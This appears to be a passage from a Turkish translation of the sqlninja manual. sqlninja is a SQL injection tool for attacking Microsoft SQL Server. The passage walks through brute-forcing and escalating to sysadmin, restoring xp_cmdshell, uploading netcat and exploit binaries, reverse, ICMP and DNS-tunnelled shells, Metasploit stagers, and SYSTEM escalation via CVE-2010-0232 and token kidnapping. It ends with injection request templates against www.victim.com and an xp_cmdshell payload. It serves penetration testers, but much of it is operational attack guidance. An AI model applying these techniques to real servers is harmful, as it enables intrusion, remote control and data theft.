yığınlara bölüp (her yığın yalnız n karakterden oluşan şifre
için n^3 şifre dener) . Eğer bir şeyler ters gidiyorsa
sqlninja durdurulur ve karşı taraftaki kaba kuvvet yığının işi
bitince bitmiş olur.
Uygulamanın veri tabanı sunucusuna bağlı olarak bu teknik
çalışmaya bilir (örneğin ODBC sorun çıkartmaktadır). Sqlninja
bunu hemen anlar ve kullanıcıyı uyarır, boşuna zaman
kaybedilmez.
Önemli Notlar
SQL 2005'den beri OPENROWSET yetkisiz kullanıcılara kapatıldı.
Eğer parmak izi konumu 2005/2008/2012 ile uğraşıldığını
söylüyor ve siz 'sa' değilseniz şansınız yoktur (ama siz hala veri
alma konumuyla veri geçebilirsiniz)
SQL sunucu 2000'de şifrelerde büyük küçük harf ayrımı yoktur,
bu da kırma işlemini çok kolaylaştırır.
Arttırma biti ODBC kullanıldığında sıkıştırılmıştır.
Arttırma
Kısaca e yazılabilir
Parametresi -p zorunludur
Eğer doğru 'sa' şifresi verildiyse o anki kullanıcı sysadmin grubuna
eklenir.
Genelde bu yönteme gereksinim yoktur, çünkü sqlninja kaba kuvvet
konumunda arttırma zaten yapılmıştır. Ama bazı koşullar olabilir ki
işlemi bağımsız yapmanız gerekebilir. Belki şifreyi sosyal mühendislik
yollarından sağlamışsınızdır.
Arttırmanın nasıl çalıştığını görmek isterseniz ya da 'sa' şifresini
bildiğiniz halde arttırma çalışmıyorsa okumaya devam edin.
Arttırma OPENROWSET birleşimiyle yapılır. Doğru 'sa' şifresi ve
sp_addsrvrolemember kullanarak kullanıcı adının sysadmin grubuna
eklenmesidir. Belki de sp_addsrvrolemember kapalı olabilir. O zaman
iki nedenden çalışmıyordur:
1 Sunucu ODBC kullanıyordur ve siz bağlantı havuzundan eski ODBC
bağlantısı kullanıyorsunuzdur ve o da eski yetkileri kullanıyordur
2 sp_addsrvrolemember kullanıma kapatılmıştır

İlkinde bir kaç şey yazdırıp eski bağlantının bitmesini ve kendiliğinden
düşmesini beklersiniz. Genelde ODBC bağlantısı işlemsiz 60 saniye
sonra düşer. Bunun olma süresi web sayfasına kaç kişinin bağlandığı,
trafiğin yoğunluğu gibi değerlerle orantılıdır.
İkinci durumda beklemek zorunda değilsiniz. -p yazıp
sqlninjanın kullandığı OPENROWSET ile bağlantılı işlem yaparsınız.
Xp Diriltmek
Kısaca x yazılabilir
Parametreler -p
Eğer aşağıdaki koşulların her ikisi de oluyorsa bu konum kullanılabilir:
Ya bizim sysadmin yetkilerimiz vardır ya da 'sa' şifresi biliniyordur
xp_cmdshell kapalıdır.
Bu konumun hedefi öncelikle geliştirilmiş xp_cmdshell işlemini yine
yaratmaktır. Burada oyunun bir çok oyuncusu vardır ve her biri de
farklı davranabilir. O halde aşağıdakileri dikkatle okuyun:
Yöntemler
xp_cmdshell geri getirmek için iki yöntem vardır
1 onu SQL 2000'de sp_addextendedproc işlemiyle, SQL
2005'de sp_configure ile) geri yüklemek. Bunun için bir
SQL komutu yeterlidir ama xplog70.dll orada olmalıdır.
2 CREATE PROCEDURE ile sp_oacreate, sp_oamethod ve
sp_oadestroy için siteye özgülerini yarat. Bu konumda
daha başka programlar da gereklidir ama eğer xplog70.dll
güvenlik nedeniyle kaldırılmışsa bu kadarı da yeterlidir.
xp_cmdshell adı
xp_cmdshell yeniden yaratılınca tanınması olanaksızdır. Bu
durumda CREATE PROCEDURE ile daha uygun bir adla
(sp_sqlbackup gibi) yaratma işlemi tamamlanabilir. İşlem adını
yapılandırma dosyasındaki xp_name_option seçeneğiyle
tanımlayabilirsiniz.
Kullanıcı Yetkileri
Eğer yetki arttırma çalışmamışsa -p ile yetkileri
değiştirebilirsiniz
OPENROWSET ve CREATE PROCEDURE birleştirilemez. O zaman -p
kullanıyorsanız CREATE PROCEDURE kullanın. Bir başka çözüm de tüm
yordam (procedure) veri tabanına gönderilen her komuta eklenerek de

tanımlanabilir. Sunucu dışarıdan eklenen bir yordam olmadan da her
şeyi yapar. Biz buna ”İçte tanımlanan (inline) yordam eklemek”
diyelim.
Bu konum kullanılırken sqlninja'nın izlediği adımlar şöyle özetlenebilir:
1 Eğer dışarıdan eklenecek yordam (procedure) adı yapılandırmaya
tanımlanmışsa (xp_cmdshell) o zaman sqlninja bunu kullanılır hale
getirmeye çalışır (sp_addextendedproc/sp_configure). Belki karşıdaki
SQL sunucunun sürümünü bilmek isteyebilirsiniz, parmak ixi
kullanmayı unutursanız sqlninja kendisi bu bilgiye erişir.
2 Eğer dışarıdan eklenen yordam (procedure) adı xp_cmdshell (daha
sinsi olmak istediğinizden olabilir) olmayacaksa (xplog70.dll kaldırılmış
olabilir) o zaman:
Eğer bizim yerel admin yetkilerimiz varsa (yani komut satırında
password yazmamız gerekmemiştir) o zaman CREATE
PROCEDURE yöntemimiz başlatılır. Eğer çalışırsa bizim kendimize
özgü yordam (procedure) tanımımız olmuştur.
Eğer bizim yerel admin yetkilerimiz yoksa (komut satırında şifre
tanımlamak zorunda kalmışızdır) o zaman satır içinde yordam
(procedure) tanımlamaya gidilir. Eğer çalışırsa yapılandırmada
xp_name değeri NULL yapılır. Bu sqlninja'ya diğer adımlarda da
satır içi yordam (procedure) tanımı yapılması gerektiğini belirtir.
Sanırım xp_cmdshell geri geldiğinde (ya da tümüyle eşdeğer başka bir
şey) her şey normale dönmüştür.
Sqlninja tarafından kullanılan size özel kod aslında Antonin Foller
kodunun biraz değiştirilmişidir.
http://www.motobit.com/tips/detpg_cmdshell/ adresinde aslını
bulabilirsiniz.
Yüklemek
Kısca u yazılabilir
Parametreler: -p
-g
Bu konum yalnız ikili bir dosyayı web sunucusuna GET ya da POST
HTTP isteği ileterek dosya yükler. Yani FTP/TFTP ya da benzeri bir işlem
gerekmez. Yüklenen dosya sunucunun %TEMP% çevre değişkeni
içindedir. Saldırı aslında MSSQL varsayılan dosya yolunu (klasör)
yazamasa da etkindir. İki tane yükleme konumu vardır.
Onarım Programı
Bu alışılmış bir türdür ve eski DEBUG.EXE programını kullanır.
İkili dosya onarım programı gibi yazılır (.scr uzantısıyla), program
yüklenir ve debug.exe'ye verilir. Program temelde bellekte bir

yer alır, gerekli baytları yazar ve sonuçları diske taşır. 16 bitlik
bir program olduğundan boyut sorunu vardır ve 64 Kbayt en
buyuk dosya boyudur. Bunları parça parça yüklemek ve sonunda
birleştirmek için sqlninja Jussi'nin dbgtool.exe algoritmasını
kullanır ( http://www.toolcrypt.org adresine bakınız).
Vbscript
Bu aslında yeni bir yöntemdir. İkili dosya base64 kalıbına çevrilir,
yükleme yapılır ve sonra küçücük bir vbscript kodu ile asıl
dosyaya dönülür. Ortalamada daha az istek üretir. İlk dosyanın
parçalanması da gerekmez ve son zamanların sistemlerinde
daha çok çalışma olanağı vardır. Eski yöntem daha güzel
gözükse de bunu kullanmayı seçebilirsiniz.
Hangi yöntemi seçerseniz seçin, yükleme yapmak için bir dosya adını
tanımlamış olmalısınız. Daha sonrası zaten otomatik yürümektedir. Bu
dosya zaten .scr ya da .base64 kalıbındaysa sqlninja yüklemeyi yapar
ama bazı kontroller (yüklenen dosya boyu doğru mu gibi)
yapılamayabilir. Sonunda sqlninja için asıl dosyayı ikili biçimde
sağlamak en iyisidir.
Sizin kolaylığınız için netcat.exe dnstun.exe icmpsh.exe churrasco.exe
vdmallowed.exe ve vdmexploit.dll programları apps ve scripts dosya
yollarında bulunmaktadır. Türüne göre bir kısmı ikili diğerleri
debug+base64 kalıbındadır. Programlar UPX ile paketlenmiştir
(boylarını küçütmek için). Bazı işlemler için netcat.exe programını
yüklemelisiniz (backscan/dirshell/revshell gibi işlemler). Ayrıca
dnstun.exe ve icmpsh.exe tünellenmiş DNS ve ICMP yalancı kabuğu
üretmek içi gereklidir. Churrasco.exe yetki arttırmak için gerekli
olacaktır. Eğer SQL sunucu SYSTEM olarak koşturulmuyorsa
Vdmallowed.exe ve vdmexploit.dll aynı saldırı için gerekecektir.
Akıldan çıkarılmaması gereken en önemli konu bir çok şeyin düzgün
gitmeme olasılığı olduğudur. Şifrelenmiş dosyanın bir satırının bile
yüklenememiş olması, programların doğru yaratılamayacağını anlatır.
Sqlninja testlerinde eğer program aranan yerde bulunursa, kaç satır
olarak yüklendiği bulunmaya çalışılır. Bu neyin hatalı olabileceği
konusunda bir ölçüde bilgi verebilecektir. Örneğin pen-test adımında
sonuç satırları doğru değerin tam iki katı olmalıdır. Burada yapılacak
olan geçici bir tablo yaratmak ve onu sayaç gibi kullanmaktır. Satır
program dosyasına sayaç çift olduğunda aktarılmalıdır.
Eğer yalnız onarım programı yaratmak isterseniz ya da yüklemeden
base64 (bir başka araçla kullanmak üzere) o zaman yükleme
konumunu -g seçeneği ile başlatın. Sqlninja dosyayı /tmp dosya
yolunda yaratır ve çıkar. Eğer sysadmin yetkileriniz yoksa
parametrede 'sa' şifresini kullanmanız gerekir.

dir kabuk komutu
Kısaca s yazılır
Parametreleri -p
Uzaktaki veri tabanı sunucusu TCP ve UDP kapı üzerinden doğrudan
erişilebiliyorsa bu konum kullanılır. Sqlninja uzaktaki kapısı, protokolü,
sorar ve veri tabanına komut mesajı ve bağlantı kurulacak mesajı
gönderir. Tabi ki daha önce netcat karşı sisteme yüklenmiş olmalıdır. -p
seçeneği karşı tarafta kullanılabilecek yetki arttıracak bir şifre
olmadığında gereklidir.
Geri tarama
Kısaca k yazılabilir
Parametreler: -p
Genelde veri tabanı sunucusu güvenlik kalkanının arkasında kalır. Ona
doğrudan erişmek olanaksızdır. Ama sunucunun en az bir kapıdan dış
Dünyaya bağlantısı vardır (DNS, HTTP gibi). Bu konum veri tabanı
sunucusuna SYN paketleri ya da UDP paketleri göndermeyi söyler.
Böylece sqlninja hangi kapıların paketleri aldığını kullanıcıya söyler.
Yapılandırma dosyasında kendi makinenizin IP adresini belirtmelisiniz
(lhost parametresi) ve hangi arayüzü dinleyeceğinizi de
tanımlamalısınız. Sqlninja hangi protokolü kullanacağını sorar
(TCP/UDP) ve bir de kapıları. Bu tanımlar bilinen netcat dil kurallarına
göre yazılmalıdır (örneğin “23 25 80-100” gibi) Eğer sysadmin
yetkimiz yoksa -p parametresine gerek vardır. Bunu kullanabilmek için
netcat daha önce karşı sisteme yüklenmiş olmalıdır. Ayrıca “pcap”
kitaplıkları da kullanılacağından sysadmin ya da root yetkiniz olmalıdır.
Ters kabuk
Kısaca r yazılır
Parametreler: -p
Doğrudan kabuk olmuyor ama backscan konumunda veri tabanı
sunucundan kullandığınız makineye açık kapı bulunmuşsa, o zaman
ters kabuk yapılabilir. Bu komunu kullanırken sqlninja yerel kapısı ve
protokolü sorar ve bağlantıya başlar. Yapılandırma dosyasında kendi
bilgisayarınızın IP numarasını (lhost değeri) belirtmelisiniz. Tabi ki
karşıdaki sistemde netcat yüklenmiş olmalıdır. Ve her zamanki gibi
şifre yetkiler yoksa yazılmalıdır.

ICMP Kabuğu
Kısaca i yazılır
Parametreler: -p
Eğer güvenlik kalkanı doğrudan ya da ters kabuk bağlantısına izin
vermezse ama karşı taraf bizim makineyi ping edebilirse, biz
kabuğumuzu ICMP tüneli içine yerleştirebiliriz. Sadece icmpsh.exe
karşı sisteme yüklenir ve icmp konumu başlatılır ve artık kendi
kabuğunuzla artık çalışabilirsiniz. Karşı taraftaki DBMS için tüm trafik
ICMP paketleri içinden geçer. Saldırıya başlandığında sqlninja
aşağıdaki bilgileri soracaktır:
Veri Saklama Alanı
Bir ICMP paketinde tutulabilecek veri boyudur. Varsayılan 64
bayt, daha hızlı bir tünel kurmak için daha büyük veri boyu
tanımlanabilir. Ama MTU değerine dikkat edilmelidir. Veri Tabanı
Yönetim Sistemi ile aranızdaki MTU ile veri büyüklüğü denetim
altında olmalıdır. Bugünün standartlarında 1300-1400 bayt
arasında bir değer uygun kabul edilir. Daha güvenli olmasını
istiyorsanız daha küçük paketler kullanabilirsiniz.
ICMP yankı istekleri arasında bekleme zamanı
Varsayılan 300 ms'dir. Ama daha hızlı bir tünel için daha küçük
bir değer de kullanabilirsiniz. Unutmayın ki çok küçük bir değer
ping akını oluşturur ki bu yoğunluk fark edilebilir. Ya da yol
üzerindeki bir anti-DoS cihazı tarafından emilip yok edilebilir.
Yanıt zaman aşımı
icmpshell.exe tarafından beklenen yanıt süresidir. Eğer yanıt
gelmezse yeni bir ICMP isteği gönderilir. Varsayılan süre 3000
ms'dir.
Önemli
Sizin bilgisayarınız ICMP yankı isteklerine yanıt vermeyecek biçimde
ayarlanmış olmalıdır. Örneğin Linux ortamında aşağıdaki komut işi
görecektir:
sysctl -w net.ipv4.icmp_echo_ignore_all=1

DNS tüneli
Kısaca d yazabilirsiniz
Parametreler: -p
Eğer doğrudan ve ters kabuk için güvenlik kalkanı engeli varsa, ICMP
kabuğu da yoksa, o zaman DNS tüneli kurmaya çalışırız. Tek
gereksinim şunlardır:
Veri Tabanı sunucusu dışarıdaki sunucu adlarını çözebilmelidir (çoğu
zaman bu geçerlidir)
Bizim IP adresini ise bir yörenin DNS sunucusudur (böyle bir şeyi satın
almak kolaydır). Burada sqlninja.net örneğini kullanırız:
Eğer tüm koşullar sağlandıysa dnstun.exe yüklenir. Daha sonra dns
tünel konumu başlatılır ve komutlarınızı göndermeye başlayabilirsiniz.
Üç aşağı beş yukarı olan şeyler şunlardır:
1 SQL eklemesiyle dnstun.exe programına komut iletilir (bizim
uzaktaki ajanımız gibi çalışır) ve uzaktaki veri tabanı tarafından
komut çalıştırılır. Çıktı yorumlanır ve biraz değişmiş olarak
base32 kalıbında bize erişir.
2 şifrelenmiş çıktı yöredeki sunucu adlarına göre parçalanmıştır
(encoded.output.sqlninja.net)
3 Bu sunucu adları gethostbyname() komutuna geçirilir. Böylece
Veri Tabanı sunucusu kendi Sunucularının DNS
çözümlemelerinde bu sunucuyu kullanmaya başlar.
4 DNS sunucusu sqlninja.net'in yetkili DNS sunucusuna bakar
(bizim IP numaramızdır) ve isteği bizim iş istasyonumuza
gönderir.
5 sqlninja isteği alır ve gerekliyse yeniden yönlendirir. Sunucu
adlarını çözümler ve sonunda komut çıktısını yazdırır. Tabi ki
sqlninja aynı zamanda DNS isteklerine de yanıt verir (sahte IP
numarasıyla) gethostbyname() komutunun hemen dönmesini
sağlamış olur.
Tüm işlem akıcıdır, yani komut çok uzunsa bitmeden siz çıktıda onu
görmeye başlarsınız. Kullanılacak yöre adı (domain) yapılandırma
dosyasında tanımlanır. Tabi sqlninja sahte bir DNS sunucu
yaratacağından ve kapı 53'e bağlı olacağından sizin root yetkisiyle
çalışmanız gerekecektir. Unutulmaması gereken DNS UDP
paketlerinden oluştuğu için paket kayıpları söz konusu olabilir.

Bu ajansın çalışabilir sürümü http://www.mingw.org/ adresindedir. Her
zamanki gibi sysadmin yetkisi olmadığında şifre parametre olarak
verilmelidir.
metasploit (http://sqlninja.sourceforge.net/sqlninja-howto.html#toc2.12)
Kısaca m yazılır
Parametre: yoktur
Basit DOS işaretinden memnun değil misiniz? Gerçek grafik kullanıcı
arayüzü kullanarak arkadaşlarınızı etkilemek ister misiniz? Eğer
yönetici yetkiniz varsa xp_cmdshell çalışıken siz de uygun bir TCP
kapıyı bulursanız (giriş ya da çıkış için) ve sqlninja'yı metasploit için
ambalaj olarak düşünürseniz ya Metaspreter ya da VNC sunucu
başlatın. Metapreter DOS işareti gibi düşünülebilir ama ondan çok
güçlüdür. Böylece uzaktaki işletim sistemi için tümüyle kontrol
edebilecek ortam oluşur. Yönlendirme tablolarını değiştirme, kapı
yönlendirme ve daha birçoğunu yapabilirsiniz. Alternetif olarak eğer
yeteri kadar geniş band aralığınız varsa VNC sunucu ekleyip/başlatıp
uzaktaki veri tabanı için iyi bir grafik erişim ortamı oluşturursunuz. Bu
saldırı komunu tümüyle otomatik olup bir nutshell kabuğunda şunlar
olur:
1 sqlninja sizden Metapreter ya da VNC seçeneklerinden
hangisini kullanacağınızı sorar. Bağlantı doğrudan mı dolaylı mı
olacak ve bağlanılacak sunucu/kapı (ters bağlantı için
bağlanılacak yerel kapı) verilir.
2 Sqlninja ara adım (stager) olarak uygun çalışan program
yaratmak için msfpayload çağırır.
3 Sqlninja sonra bunu bir onarım programına çevirir ve karşıya
yükler.
4 Bizim bir DLL eklememiz gerektiğinden Veri çalıştırmasını
önleme adımını kapatmamız gerekir (aka 'DEP' Windows 2003
SP1'den beri bunlar varsayılan olarak etkindirler). Karşı sistemde
Metasploit'in çeşitli sürümleri bunu otomatik olarak çözer.
Register kayıtlarına ve bizim çalışan programı beyaz listeye
taşıyarak yapar (checkdep parametrelerine bakın)
5 Sonuç olarak Sqlninja msfcli programını çağırır gerekli DLL
dosyasını ekler.

Sqlninja web sitesinde bu saldırıyı gösteren canlı bir video vardır. Tabi
ki bu saldırı konumunu kullanabilmek için sizin bilgisayarınızda
Metasploit3 olmalıdır. Metasploit çalışan programları (msfpayload
msfcli ve msfencode) sizin dosya yolunuzda değilse mutlak yollarını
yapılandırma dosyasında belirtebilirsiniz. Eğer VNC konumunu
kullanıyorsanız VNC istemcisi yüklediğinize emin olun.
SQL komutu
Kısaca c yazılır
Parametre yoktur
Bazen sysadmin yetkiniz olsa da xp_cmdshell çalışsa da, yüklenen
programlarda hata olduğundan ya da kapılar kapatıldığından ya da
DNS ile sunucu adı çözümü kapatıldığından kabuk çalışmaz. Bu
durumda bile Veri Tabanına tek komut gönderebilmek sonuç
görülemese bile yararlı olabilir. Örneğin yerel bir kullanıcı eklemek
istenebilir. Ya da yöresel bir kullanıcı. SQL SUNUCU bu yetkilerle
çalışabilir (tahmin edilenden çok daha fazla bu tür sunucu vardır).
Böyle bir durumda DOS komut penceresinden sqlninja'yı uzaktan
çalıştırabilirsiniz. Yalnız çalıştığını bilir ama çıktısını göremezsiniz. Tabi
ki zamanlamayı izleyerek neler olup bittiğini görebilirsiniz. Örneğin
if exists filename (ping -n 5 127.0.0.1)
eğer komut 5 saniye sürerse dosya var demektir. Bir komutun doğru
çalışıp çalışmadığı ERRORLEVEL çevre değişkeni değerinden de
anlaşılabilir. Değeri eğer son komut doğru çalışmışsa sıfırdır. O zaman
karşı SQL sunucuda SYSTEM yetkisiyle çalışma olup olmadığı:
whoami > who.txt & find /i “\system “ who.txt & if not
errorlevel = 1 ping -n 5 127.0.0.1 & del who.txt
Eğer komut 5 saniye civarında sürerse, SQL SYSTEM yetkisiyle
çalışmaktadır (whoami.exe windows 2003'de varsayılan olarak bulunur
ve windows 2000'de “Resource kit” yüklenmişse vardır). DOS
bilgilerinize yeniden dönerseniz AUTOEXEC.BAT içine komut eklemeyi
anımsayıp servis durdurup başlatma ve gerekli kullanıcı ekleme
işlemlerini yapabilirsiniz.
Bu komun diğer konumlardan biri çalışmadığında yararlı olabilir. Neyin
hatalı olduğunu anlamak ve sorunu çözümlemek için kullanabilirsiniz.
Aşağıdaki komutu yazarak SQL sunucunun kime ait olduğunu
söyleyebilirsiniz:
echo Sahibiniz sqlninja'dır > c:\sqlninja.txt

Veri alma/çekme
Kısaca g
Parametreler: -p
Öncelikle bu konu hala denemeler düzeyindedir. Hala onarılması
gereken hatalar vardır. Doğruluğun son düzeyde olduğunu
düşünmemelisiniz. Bu program parçası (module) 100% etkileşimlidir.
Bu yüzden sqlninja iki etkin kanaldan bu hizmeti sunmaktadır. Bunlar
sırasıyla zaman tabanlı, ve DNS tabanlı ortamlardır.
Zaman Tabanlı
Yapılandırma dosyasında data_channel için time kullanılmışsa
zaman tabanlı kanal kullanılır. WAITFOR DELAY komutu bilgi
almak içindir. Sqlninja zaman tabanlı kırılmada eklemeyi iki
yönlü yapar.
Zaman tabanlı ikili arama
Bu yöntem data_extraction binary olarak seçilmişse
etkinleştirilir. Eğer bilgisayarlar konusunda marjinal bilginiz
de olsa, ikili arama algoritmasının nasıl çalıştığını bilirsiniz.
Temelde uygulamaya gönderilecek istekleri en aza
indirgemeye çalışır. Bunun en önemli yararı varlığınızın
dikkat çekici olmamasıdır. Ama sorgulamaların yarısında
bekleme tetiklenecektir. Bunun anlamı yöntemin en hızlı
yöntem olmadığıdır.
Zaman tabanlı sıralı/en iyilenmiş arama
Eğer yapılandırma dosyasında data_extraction için
optimize (en uygun sayılan) ya da serial (seri)
tanımlanmışsa bu yöntem etkinleştirilir. Bu yöntemde tüm
yöntemler sırayla denenir sonunda en uygun olan seçilir.
Aralarındaki tek fark işleme alma sıralamasıdır. Serial ASCII
değerlerin hepsini sırayla denerken ikincisi en çok
kullanılanlardan başlar. Gerçek sıralama language_map
parametresiyle belirlenir. Bu sıralama gerçek zamanlı
olarak güncellenir. Alınan gerçek karakterlerin kullanım
sıklığına göre değişiklik uygulanır (eğer
language_map_adaptive parametresine atama yapılmışsa)
DNS tabanlı alma
DNS yöre ve alt yöreleri üzerinde denetiminiz varsa DNS
Sunucusunun A tipi istekte bulunmasını sağlarsınız. Eğer
uzaktaki veri tabanı yönetim sistemi dış sunucu adlarını
çözebiliyorsa, o zaman arayüz tabanlı bilgi almalardan
vazgeçip ışık hızında bilgi çekmeye başlayabilirsiniz
(karşılaştırmalı olarak bu daha hızlı bir yöntem). Sqlninja
root yetkisiyle çalışıyor olmalı ve domain (yöre)
parametresi tanımlanmış olmalıdır.

Ek Bilgiler
Varsayılan olarak sqlninja çekilen/alınan tüm verileri yerel
SQLite veri tabanında saklar. Veri tabanının adı komut
satırındaki -s parametresinde bulunur. Varsayılan adı
session.db olarak bilinir.
Diğer Saldırılar
Çoğunlukla SQL sunucu SYSTEM olarak çalıştırılmaz ama daha az
yetkili (çoğu zaman “Network Service” ) kullanıcı vardır. Bu saldıranın
yapacaklarını da sınırlar (şifre karışımını çekil almak gibi). Bu
yetkisizlik VNC için de sorunlar oluşturabilir. Genelde boş ve karanlık
bir ekranla karşılaşılabilir. Ama sqlninja ile yetkileri SYSTEM düzeyine
arttırabiliriz. Bunun için iki değişik saldırı yöntemi kullanılabilir.
CVE-2010-0232
Eğer SQL Sunucu az yetkili bir kullanıcı olarak çalışıyorsa ve
makinede CVE-2010-0232 için yama uygulanmamışsa sqlninja
içinde bulunan Tavas Ormandy tarafından yazılan kırılma
programıyla işlem yapılır. Gerçek exploit DOS işaretli pencere
yaratırken bizim sürümümüz sqlserver.exe arar ve SYSTEM
olarak çalışmasını sağlar. Böylece saldırı adımları aşağıdaki
sırayla yapılır:
1 vdmallowe.exe ve vdmexploit.dll yüklemeleri yapılır.
Bunlar bizim sistemimizde apps yolu altında çalışabilir
durumdadır. Script yolu altında (onarılabilir programlar
olarak)
2 sqlcmd_attack mode kullanılarak şu komut çalıştırılır:
%TEMP%\vdmallowed sql
3 Eğer saldırı başarılıysa parmak izi konumu size sql
sunucunun SYSTEM olarak çalıştığını belirtir.

Token Kaçırma
Windows 2003'de yetkilerimizi token kaçırmayla arttırabiliriz.
Cesar Cerrude tarafından araştırılmış bir tekniktir
(http://www.argeniss.com/research/TokenKidnapping.pdf) Bu
kavramın ispatı için churrasco.exe
(http://www.argeniss.com/research/Churrasco.zip) programını
geliştirdi (sqlninja içinde birazcık değiştirilmiş sürümü vardır).
Eğer SYSTEM'e arttırmak isterseniz bu programı yüklemeniz
yeterlidir. Daha sonra usechurrasco seçeneğini yes yapın.
Bundan sonra tüm komutlar churrasco.exe üzerinden geçer. Eğer
karşı sql sunucu bu saldırıya karşın korunacak yamalarla
donatılmışsa işlem çalışmaz. Parmak izi konumunda işlemlerin
çalışıp çalışmadığını görebilirsiniz.
Önemli: churrasco programının değiştirilmiş sürümünü
kullanmayı unutmayın (sqlninja tar topunda olanı) ya da işler
zaten kırılır. Kaynak kodları incelerseniz farkları görebilirsiniz.
Ama farklar aşağıdakilere benzer:
1 ayrıntısız çıktı (eğer -d seçeneği kullanılırsa ayrıntılar
listelenir). Ayrıntılı çıktı parmak izi konumunun 5.
seçeneğiyle çakışır. O seçenek churrasco.exe sonuçları için
geçici bir tablo ya da geçici bilgi saklama alanı oluşturur.
2 yetkisiz kullanıcının %TEMP% klasörünü
1pCurrentDirectory parametresindeki değer olarak
kullanması için CreateProcessAsUser() çağrılır. Sizin
programlar (netcat gibi) SYSTEM'in %TEMP% dosya
yolundadır.
Yapılandırma Dosyası
Yapılandırma dosyası (varsayılanı sqlninja.conf) sqlninja davranışının çoğunu
kontrol eder. Tüm seçenekler
seçenek_adı = seçenek_değeri

içimindedir. Tek fark httprequest HTTP isteğini tanımlar ve eklenti birden
çok satıra dağılmış olabilir. Seçenekler kabaca aşağıdaki sınıflara
bölünmüştür:
Temel:
Saldırıyı ayarlamak için kullanılanlar.
Veri Çekme/Alma
Veri çekme konumunu ayarlamakta kullanılanlar.
İlerlemiş
Ek ince ayarlar için kullanılır.
Seçenekleri bir çoğu büyük küçük harf ayrımı içermez (URL değerleri küçük
harftir). Aynı seçenek birçok kez kullanılabilir, sqlninja her zaman sonuncu
değeri kullanır. Açıklama her yerde kullanılabilir ama “--httprequet_start--”
ve “--httprequest_end--” arasında kullanılamaz. Açıklamanın önünde '#'
karakteri bulunur. Dosyanın İçeriğinde ne olduğu sqlninja.conf.example
dosyasında örnek olarak yer alır.
Temel İşlemler
httprequest (http isteği)
Sürüm 0.2.6'dan sonra http isteğini ayarlamak için sqlninja yeni
bir yöntem kullanmaya başladı. Sunucu, kapı ve sayfa için ayrı
ayrı parametreler yerine HTTP isteği bir kerede tanımlandı. Bir
işaret (varsayılanı __SQL2INJECT__) sql komutlarının nereye
eklenmesi gerektiği gösterildi. Eklenecek vektörün nerede
olacağı konusunda tümüyle geniş bir özgürlük ve esneklik de
getirdi. Artık GET ve POST parametreleriyle sınırlı olmak söz
konusu değildir. İstediğiniz her yere ekleyebilirsiniz. Sqlninja
HTTP isteğini her şey olarak düşünür. Bu bilgi
“--httprequest_start--” ve “--httprequest_end--” satırları arasına
yazılır. Genelde aşağıdaki ögeler eklenmelidir:
HTTP yöntemi (GET ya da POST)
Kaynakların bulunduğu URL adresi (http:// ya da https:// da
dahil olacak biçimde)
Standart değilse kapı numarası (örnek
http://www.victim.com:8080 gibi)

Diğer gerekli başlıkların hepsi
Boş satırdan sonraki gövde (eğer POST kullanılıyorsa)
Genelde en iyi strateji SQL eklemeyi yapacak ve isteği
tetikleyecek proxy kullanmaktır (örneğin Burpsuite). Bunu
sqlninja.conf içine kopyalamak gerekir. Örneğin düzgün metin
olan HTTP'de GET tabanlı ekleme aşağıdaki gibi olabilir:
--httprequest_start--
GET http://www.victim.com/page.asp?
string_param=aaa';__SQL2INJECT__&other_param=blah HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US;
rv:1.7.13) Gecko/20060418 Firefox/1.0.8
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0
.9,text/plain;q=0.8,image/png,*/*
Accept-Language: en-us,en;q=0.7,it;q=0.3
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Connection: close
--httprequest_end--
Alternatig olarak HTTPS üzerinden POST tabanlı ekleme
aşağıdaki gibi olabilir:
--httprequest_start--
POST https://www.victim.com/page.asp HTTP/1.0
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13)
Gecko/20060418 Firefox/1.0.8
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/pla
in;q=0.8,image/png,*/*
Accept-Language: en-us,en;q=0.7,it;q=0.3
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONID=xxxxxxxxxxxxxxxxxxxx
Connection: close
numeric_param=12;__SQL2INJECT__
--httprequest_end--
sqlninja için Content-Length buradaki eklentilerde yoktur.
Program uygun değeri otomatik hesaplar.
Son olarak cookie (çerez) tabanlı ekleme aşağıdaki gibi
olabilir:

--httprequest_start--
GET http://www.victim.com:8080/page.asp?param1=aaa&param2=blah
HTTP/1.0
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13)
Gecko/20060418 Firefox/1.0.8
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/pla
in;q=0.8,image/png,*/*
Accept-Language: en-us,en;q=0.7,it;q=0.3
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Cookie: ASPSESSIONID=xxxxx'%3B__SQL2INJECT__
Connection: close
--httprequest_end--
Tırnaktan sonra noktalı virgülün nasıl kodlandığına bakmayı
unutmayın. Çünkü sunucu cookie'ler (çerezler) arasında
noktalı virgülü ayıraç olarak algılayabilir.
__SQL2INJECT__ işareti öncesinde, asıl sorgulamayı
kapatacak her şeyi eklemelisiniz ve yeni bir tanesine
başlamanız gerekir. Bu tür parametreler ve karakter
sıralamaları size komut ekleme yapma olanağı sunar. Bunun
anlamı:
1 ad ve değer ikilisinden oluşan parametreler (ad+değer)
2 tek tırnak (parametre bir diziyse)
3 noktalı virgül (asıl sorgulamayı sonlandırır)
Tüm bunlara ek olarak asıl sorgulamayı sonlandıracak her
şeyin içerilmesi gerekir. Doğru sayıda aç v kapat parantez
gibi. Örneğin aşağıdaki gibi bir TSQL komutu eklenecekse:
param1=1&param2=x'));exec+master..xp_cmdshell+'dir+c
:'
Yapılandırma dosyasındaki HTTP isteği aşağıdakileri
içermelidir:
param1=1&param2=x'));__SQL2INJECT__
Unutulmaması gereken önemli şeyler:

İlk anda SQL ekleme için kullanılacak HTTP isteklerini
birbirlerine yakın göndermek genelde iyi bir tekniktir.
Bazı uç noktalarda azıcık değiştirilen bir başlık bilgisi
bile büyük değişikliklere neden olur. Önerilen ve
genelde güvenle kullanılan HTTP/1.0 değişikliğidir. Bu
biçimde bağlantının açık kalması engellenmiş olur.
Size tüm gücü ve esnekliği sağlayabilmek için sqlninja
çıkarınıza kullanırken hiç birşeyi değiştirmez. Yani
